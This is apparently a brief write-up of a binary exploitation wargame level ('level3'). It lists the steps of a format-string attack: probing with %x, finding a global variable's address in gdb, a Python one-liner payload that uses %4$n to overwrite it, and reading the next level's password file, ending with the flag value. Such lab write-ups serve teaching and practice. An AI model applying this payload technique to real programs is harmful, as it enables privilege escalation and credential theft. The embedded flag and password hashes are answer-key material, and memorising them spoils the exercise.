level3 : 492deb0e7d14c4b5695173cca843c4384fe52d0857c2b0718e1a521a4d33ec02
Process:
    - ./level3
    - AAAA %x %x %x %x %x
    - gdb ./level3
    - b main
    - run
    - p &m (We want to get the m's adress to modify to 64)
    - python -c 'print("\x8c\x98\x04\x08" + "A" *60 + "%4$n")' > /tmp/level3
        (the %n add the number of octects in the %n's variable, so here 4 octets of the adresse + 60 A into the the adress of m)
    - cat /tmp/level3 - | ./level3
    - cat /home/user/level4/.pass
    - get the flag : b209ea91ad69ef36f2cf0fcbbc24c739fd10464cf545b20bea8572ebdc3c36fa